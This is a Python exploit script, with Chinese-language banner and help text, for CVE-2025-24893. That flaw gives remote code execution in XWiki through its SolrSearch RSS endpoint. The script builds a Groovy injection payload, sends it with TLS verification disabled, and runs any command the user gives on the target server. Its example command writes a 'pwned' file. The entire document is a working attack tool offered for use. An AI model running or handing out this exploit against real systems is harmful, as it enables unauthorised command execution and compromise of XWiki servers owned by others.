import argparse import requests import sys from urllib.parse import urljoin VULN_PATH = "/xwiki/bin/get/Main/SolrSearch?media=rss&text=" PAYLOAD_TEMPLATE = "}}}{{async async=false}}{{groovy}}%s;println('EXPLOIT_SUCCESS'){{/groovy}}{{/async}}" def banner(): print("\033[36m" + """ **************************************************** * CVE-2025-24893 * * XWiki RCE漏洞利用工具 * * 作者: iSee857 * **************************************************** """ + "\033[0m") def execute_exploit(target_url, command): try: full_url = urljoin(target_url.rstrip('/') + '/', VULN_PATH.lstrip('/')) safe_cmd = command.replace('{', '{{').replace('}', '}}') safe_cmd = safe_cmd.replace('\\', '\\\\') safe_cmd = safe_cmd.replace("'", "\\'") payload = PAYLOAD_TEMPLATE % safe_cmd params = {'media': 'rss', 'text': payload} headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } response = requests.get( full_url, params=params, headers=headers, allow_redirects=False, verify=False, timeout=20 ) if response.status_code == 200 and 'EXPLOIT_SUCCESS' in response.text: print("[+] 漏洞利用成功!响应片段:") print(response.text[:300].split('EXPLOIT_SUCCESS')[0] + "...[SUCCESS]") return True else: print(f"[-] 利用失败,状态码:{response.status_code}") return False except Exception as e: print(f"[-] 错误:{str(e)}") return False if __name__ == "__main__": banner() parser = argparse.ArgumentParser(description="XWiki RCE漏洞利用工具 CVE-2025-24893") parser.add_argument("URL", help="目标URL (例: http://127.0.0.1:8080)") parser.add_argument("COMMAND", help="Groovy命令 (例: 'new ProcessBuilder(\"bash\",\"-c\",\"echo pwned > /tmp/pwned.txt\").waitFor()')") args = parser.parse_args() if '\\' in args.COMMAND: args.COMMAND = args.COMMAND.replace('\\', '/') success = execute_exploit(args.URL, args.COMMAND) sys.exit(0 if success else 1)